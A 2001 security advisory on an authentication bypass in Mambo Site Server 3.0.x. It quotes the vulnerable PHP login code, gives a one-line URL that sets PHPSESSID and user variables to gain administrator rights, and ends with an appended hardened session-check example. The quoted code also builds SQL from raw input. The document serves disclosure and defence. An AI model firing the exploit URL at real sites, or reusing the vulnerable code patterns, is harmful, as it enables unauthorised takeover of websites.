mambo_advisorie.txt
Serious security hole in Mambo Site Server version 3.0.X
Jul, 24 2001
by: Ismael Peinado Palomo - postmaster@reverseonline.com
www.reverseonline.com

Summary

Mambo Site Server is a dynamic portal engine and content management tool based on PHP and MySQL.

Details

Vulnerable systems: Mambo Site Server version 3.0.0 - 3.0.5
Immune systems:
Impact: Any user can gain administrator privileges.

Exploits:

Under the 'administrator/' dir. we found that index.php checks the user and password:

	if (isset($submit)){
		$query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
		$result = $database->openConnectionWithReturn($query);
		if (mysql_num_rows($result)!= 0){
			list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
			.....
			if (strcmp($dbpass,$pass)) {
				//if the password entered does not match the database record ask user to login again
				print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
			}else {
				//if the password matches the database
				if ($remember!="on"){
					//if the user does not want the password remembered and the cookie is set, delete the cookie
					if ($passwordcookie!=""){
						setcookie("passwordcookie");
						$passwordcookie="";
					}
				}
				//set up the admin session then take the user into the admin section of the site
				session_register("myname");
				session_register("fullname");
				session_register("userid");
				print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
				print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
			}
		}else {
			print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
		}

As we can see, if the password for the administrator matches the one in the database, some variables are registered in the session and we are redirected to index2.php... so let's take a look at index2.php:

	if (!$PHPSESSID){
		print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
		exit(0);
		}
	else {
		session_start();
		if (!$myname) session_register("myname");
		if (!$fullname) session_register("fullname");
		if (!$uid) session_register("userid");
		}

Here we can see that the only verification of a valid user is through the global var. PHPSESSID, so if we declare that variable on the URL, and set 'myname', 'fullname' and 'userid' as well, we can gain administrative control... so we'll test:

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

BINGO!! Now we have full administrative privileges... that's a typical example of PHP hacking... it's clear that security can't rely on global variables, since they may be modified through URL parsing.

Ismael Peinado Palomo
Chief R&D Engineer
postmaster@reverseonline.com
www.reverseonline.com
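The remedy the advisory points to, written out as an added example (not Mambo's code): the login handler records the administrator's identity only in server-side session state after the password check, and the index2.php gate authorises from that state alone, never from PHPSESSID or other request parameters. The session key names, the PDO handle $pdo and the use of password_hash() digests in the users table are assumptions.

```php
<?php
// Added example, not Mambo's own code: a hardened login gate for the
// administrator area. Session keys (admin_userid, admin_name, admin_fullname)
// and the PDO handle $pdo are assumptions; stored passwords are assumed to be
// password_hash() digests rather than the plaintext the original compared.

ini_set('session.use_only_cookies', '1'); // a PHPSESSID in the URL is ignored
ini_set('session.use_strict_mode', '1');  // unknown session ids are rejected
session_start();

// index.php side: authenticate against the database (parameterised query),
// then record the result in server-side session state only.
function adminLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare(
        'SELECT id, password, name FROM users
          WHERE username = ? AND usertype IN (?, ?)'
    );
    $stmt->execute([$username, 'administrator', 'superadministrator']);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return false;
    }
    session_regenerate_id(true);           // fresh id after privilege change
    $_SESSION['admin_userid']   = (int) $row['id'];
    $_SESSION['admin_name']     = $username;
    $_SESSION['admin_fullname'] = $row['name'];
    return true;
}

// index2.php side: the only source of identity is $_SESSION, populated above.
// $_GET / $_POST / register_globals values such as $myname play no part.
function requireAdmin(): array
{
    if (empty($_SESSION['admin_userid']) || empty($_SESSION['admin_name'])) {
        header('Location: index.php');
        exit;
    }
    return [
        'userid'   => $_SESSION['admin_userid'],
        'myname'   => $_SESSION['admin_name'],
        'fullname' => $_SESSION['admin_fullname'] ?? '',
    ];
}

$admin = requireAdmin();   // every admin page calls this before doing anything
```

With this gate, the request from the advisory (PHPSESSID=1 plus myname/fullname/userid in the query string) never reaches $_SESSION and is simply redirected to the login page.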